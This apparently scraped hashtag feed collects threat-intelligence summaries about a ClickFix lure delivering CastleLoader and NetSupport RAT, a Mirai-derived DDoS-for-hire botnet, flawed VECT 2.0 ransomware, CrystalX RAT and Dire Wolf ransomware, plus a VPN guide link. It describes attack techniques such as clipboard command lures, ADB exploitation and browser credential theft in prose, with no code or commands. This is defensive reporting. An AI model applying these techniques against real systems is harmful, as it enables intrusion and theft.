ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

DDoS-for-Hire Operation Exposed: How an Operator's Debug Build Unraveled a Commercial Game-Server Botnet

An exposed open directory on a Netherlands-hosted server revealed the complete operational toolkit of xlabs_v1, a Mirai-derived IoT botnet operated by an actor using the handle Tadashi. The operation provides DDoS-for-hire services specifically targeting game servers and Minecraft hosts through 21 distinct flood attack variants. The botnet exploits Android Debug Bridge (ADB) on TCP/5555 to compromise over 4 million potentially vulnerable IoT devices including Android TV boxes, smart TVs, and routers. The operation features bandwidth profiling to price-tier infected devices, ChaCha20 string encryption with cryptographic weaknesses, and competitor-eradication routines. Infrastructure analysis consolidated the entire operation within a single bulletproof /24 netblock in the Netherlands, with co-located cryptojacking infrastructure also identified.

Pulse ID: 69f25f09e5c3a33611f7cb16
Pulse Link: https://otx.alienvault.com/pulse/69f25f09e5c3a33611f7cb16
Pulse Author: AlienVault
Created: 2026-04-29 19:42:01

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #ChaCha20 #CryptoJacking #CyberSecurity #DDoS #DoS #Encryption #InfoSec #IoT #Minecraft #Mirai #OTX #OpenThreatExchange #RAT #TCP #TheNetherlands #bot #botnet #AlienVault

📢 VECT 2.0 : un ransomware RaaS qui détruit irrémédiablement les fichiers par défaut de conception
📝 ## 🔍 Contexte

Publié le 28 avril 2026 par Check Point Research (CPR), cet article présente une analys...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-vect-2-0-un-ransomware-raas-qui-detruit-irremediablement-les-fichiers-par-defaut-de-conception/
🌐 source : https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/
#ChaCha20 #ESXi #Cyberveille

VECT: Ransomware by design, Wiper by accident

Check Point Research discovered critical flaws in VECT 2.0 ransomware affecting Windows, Linux, and ESXi platforms. A fundamental encryption implementation error causes files larger than 128 KB to be permanently destroyed rather than encrypted. The malware uses ChaCha20-IETF cipher but only saves one of four decryption nonces required for large files, making recovery impossible even after ransom payment. VECT's encryption speed modes are non-functional, thread scheduling degrades performance, and anti-analysis code is unreachable. Despite partnerships with TeamPCP and BreachForums for distribution, the technical implementation demonstrates amateur execution behind a professional facade. The nonce-handling flaw exists across all platform variants since initial deployment, effectively transforming this ransomware into a wiper for enterprise assets including VM disks, databases, and backups.

Pulse ID: 69f0e1a5f1a168738b4eda1a
Pulse Link: https://otx.alienvault.com/pulse/69f0e1a5f1a168738b4eda1a
Pulse Author: AlienVault
Created: 2026-04-28 16:34:45

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #ChaCha20 #CheckPoint #CyberSecurity #Encryption #InfoSec #Linux #Malware #OTX #OpenThreatExchange #RAT #RansomWare #Windows #bot #AlienVault

📢 CrystalX RAT : un nouveau cheval de Troie MaaS combinant espionnage, vol de crypto et fonctions de canular
📝 ## 🔍 Contexte

Publié le 1 avril 2026 par l'équipe GReAT de Kaspersky, cet article présente l'a...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-02-crystalx-rat-un-nouveau-cheval-de-troie-maas-combinant-espionnage-vol-de-crypto-et-fonctions-de-canular/
🌐 source : https://www.kaspersky.com/blog/prankware-crystalx-rat-maas/55537/
#ChaCha20 #CrystalX #Cyberveille

¯\_(ツ)_/¯

#cryptography #cypherpunk #chacha #pgp #gpg #chacha20 #xchacha20_poly1305 #aes #des #camellia #aegis256

https://techlife.blog/posts/2025-vpn-list/#the-digital-privacy-landscape-in-2025

#vpn #vpns #protonvpn #proton_vpn #nordvpn #cyberghost #CyberGhostVPN #vpnguide #vpn2025 #vpnprovider #vpnproviders #protocol #protocols #security #privacy #wireguard #wireguard_vpn #WireGuardVPN #openvpn #ikev2 #ikev2 #ipsec #vpn_ipsec #AES256 #aes_256 #chacha20 #expressvpn #mullvad #MullvadVPN #Surfshark #surfsharkvpn

Szyfrowanie danych, usuwanie backupów, zacieranie śladów… analiza ransomware Dire Wolf

Dire Wolf jest nową grupą przestępczą, której aktywność zaobserwowano w maju br. Pierwszymi ofiarami cyberprzestępców były firmy z sektora technologicznego, finansowego oraz budownictwa działające we Włoszech, Tajlandii, Australii oraz Indii. Działania cyberprzestępców ukierunkowane są głównie na zysk finansowy. W celu zwiększenia szansy na uzyskanie okupu, wykorzystują technikę double extortion, grożąc...

#Teksty #Chacha20 #Curbe25519 #Direwolf #DoubleExtortion #Ransomware

https://sekurak.pl/szyfrowanie-danych-usuwanie-backupow-zacieranie-sladow-analiza-ransomware-dire-wolf/